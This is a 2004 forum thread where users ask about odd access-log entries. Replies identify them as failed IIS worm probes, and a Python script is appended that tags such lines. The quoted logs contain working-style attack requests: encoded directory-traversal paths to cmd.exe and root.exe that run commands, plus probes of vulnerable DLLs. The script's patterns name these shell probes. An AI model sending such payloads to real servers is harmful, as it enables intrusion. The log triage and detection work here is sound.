mg66
I found the following line in my access log:
63.198.8.12 - - [20/Aug/2004:23:00:21 +11330] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 234 "" ""
Is anyone able to explain what it is?
TRUSTAbyss
It's a worm trying to hack into an IIS server lol, oh god that's funny.
Dude, you have nothing to worry about, it's a normal log file, see
the 404 part, that means it's not found, have a nice day!
In the current beta you can choose what paths you can log, so you
can refuse to log requests from /_vti_bin/, don't worry about it.
senshi
LMAO
Just hope the poor bloke didn't lose his bottle.
Drag0n
Hmm, I got something similar to those...
Are these also for IIS?
68.189.78.164 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
211.34.181.4 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" ""
TRUSTAbyss
Umm, yeah! All of these are IIS attacks, in fact everything you see weird
in a log file is most likely an IIS attack, shows how much IIS sucks lol.
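Added example, not part of any post in this thread: a small triage script that tags access-log lines like the ones quoted above (double-encoded `%255c`, overlong `%c0%af`, `cmd.exe`/`root.exe`, the two DLL names) and records whether the server answered with an error or a success status. The function names, tag names and sample lines are assumptions made for this illustration; the sample lines are constructed, using documentation IP addresses and request paths copied from the thread.

```python
import re
from urllib.parse import unquote_to_bytes

# Access-log line: client, timestamp, "METHOD path [protocol]", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) ([^\s"]+)[^"]*" (\d{3})')
# 0xC0/0xC1 lead bytes never occur in valid UTF-8; they mark overlong encodings
OVERLONG_RE = re.compile(rb"[\xc0\xc1]")
SHELL_RE = re.compile(rb"(?:cmd|root)\.exe")
DLL_RE = re.compile(rb"(?:fp30reg|nsiislog)\.dll")

def classify(path):
    """Return the set of probe traits found in one request path."""
    once = unquote_to_bytes(path)    # what a single URL-decode yields
    twice = unquote_to_bytes(once)   # a second pass exposes %25xx tricks
    low = twice.lower()
    tags = set()
    if twice != once:
        tags.add("double-encoded")
    if OVERLONG_RE.search(once):
        tags.add("overlong-utf8")
    if b"../" in low or b"..\\" in low:
        tags.add("traversal")
    if SHELL_RE.search(low):
        tags.add("shell-probe")
    if DLL_RE.search(low):
        tags.add("iis-dll-probe")
    return tags

def scan(lines):
    """Return (client, status, tags, answered_ok) per suspicious line;
    answered_ok is True for a status below 400, which deserves a closer look."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, path, status = m.group(1, 3, 4)
        tags = classify(path)
        if tags:
            hits.append((client, int(status), sorted(tags), int(status) < 400))
    return hits

# Constructed sample lines (documentation IPs); request paths copied from the thread
SAMPLE = [
    '192.0.2.10 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""',
    '192.0.2.10 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""',
    '192.0.2.10 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""',
    '192.0.2.11 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" ""',
    '192.0.2.12 - - [22/Aug/2004:03:05:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "" ""',
]
```

Calling `scan(SAMPLE)` returns four hits, all with an error status; the constructed `/index.html` line is not reported.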